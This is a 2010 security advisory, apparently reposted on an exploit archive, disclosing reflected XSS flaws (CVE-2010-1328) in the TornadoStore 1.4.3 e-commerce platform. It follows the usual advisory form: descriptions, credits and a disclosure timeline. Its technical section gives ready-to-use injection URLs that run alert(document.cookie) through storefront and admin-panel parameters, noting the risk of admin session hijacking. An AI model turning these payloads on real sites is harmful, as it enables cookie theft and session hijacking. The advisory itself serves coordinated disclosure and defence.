TornadoStore 1.4.3 XSS Vulnerability
Posted on 29 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>TornadoStore 1.4.3 XSS Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================== TornadoStore 1.4.3 XSS Vulnerability ==================================== 1. *Advisory Information* Title: Multiple XSS in TornadoStore 1.4.3 Advisory ID: BONSAI-2010-0107 Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/tornadostore-multiple-xss-0107.php Date published: 2010-06-29 Vendors contacted: TornadoStore Release mode: Coordinated release 2. *Vulnerability Information* Class: Multiple Cross Site Scripting (XSS) Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2010-1328 3. *Software Description* TornadoStoreòÄâ is an ecommerce platform. The objective is to solve integrally the commercialization of products and services of companies using an online payment system. [0]. 4. *Vulnerability Description* Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. For additional information, please read [1]. 5. *Vulnerable packages* Version <= 1.4.3 6. *Non-vulnerable packages* TornadoStore developers informed us that all users should upgrade to the latest version of TornadoStore, which fixes this vulnerability. More information to be found here: http://www.tornadostore.com 7. *Credits* This vulnerability was discovered by Lucas Apa ( lucas -at- bonsai-sec.com ). 8. *Technical Description* 8.1 A Reflected Cross Site Scripting vulnerability was found in the "tipo" and "destino" variables within the 'Services' section and "rubro", "arti" on 'Products' section. This is because the application does not properly sanitise the users input. The vulnerability can be triggered by clicking on the following URL: http://www.example.com/login_registrese.php3?tipo=bonsai"/><script>alert(document.cookie)</script>&destino=ordenes_pago.php3 http://www.example.com/login_registrese.php3?destino=cliente_ctacte.php3"<script>alert(document.cookie)</script> http://www.example.com/precios.php3?pbegin=0&subrubro=15&rubro=4"</a><script>alert(document.cookie)</script>"&expand=SI&familia=&marca=&campoorden=nArtPre&vertodos=ALL http://www.example.com/recomenda_articulo.php3?arti=002"><script>alert(document.cookie)</script> 8.2 A Reflected Cross Site Scripting vulnerability was found in the TornadoStore Administration Panel. In "descrip" and "tit" variables within the 'e-Commerce' Section. This could lead to admin session hijacking. http://www.example.com/control/abm_det.php3?db=ts_143&tabla=profile&id=cDefSec%3DMAIN%2CcDefKey%3DMAIL_PEDIDO_TEMPRANO%2CcSis%3Ddemo_143&tabla_det=&tit=Par%E1metros%20del%20sitio&pkmapped=&ira=&pagina=1&det_order=&det_ordor=&txtBuscar=&vars=display_text_chars=45,display_text_lines=1&where=cDefSec=%27MAIN%27&whereMaster=cDefSec=%27MAIN%27&descrip="<script>alert(document.cookie)</script><a href=" http://www.example.com/control/abm_list.php3?db=ts_143&tabla=delivery_courier&tabla_det=delivery_costo&order=&ordor=&tit=</span></td><script>alert(document.cookie)</script>&transporte=&ira=&pagina=1&det_order=nDeCSer&det_ordor=asc&txtBuscar=&vars=&where= http://www.example.com/control/abm_det.php3?db=ts_143&tabla=usuario&tit=</span></td><script>alert(document.cookie)</script> 9. *Report Timeline* - 2010-02-02: Vulnerabilities were identified. - 2010-02-08: Vendor confirmed these vulnerabilities. - 2010-02-16: Vendor contacted for an approximate fix release date. No specific answer given. - 2010-03-10: Vendor fixed these vulnerabilities. No specific answer given. - 2010-04-12: Vendor fixed this issue. - 2010-05-29: The advisory BONSAI-2010-0107 is published. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
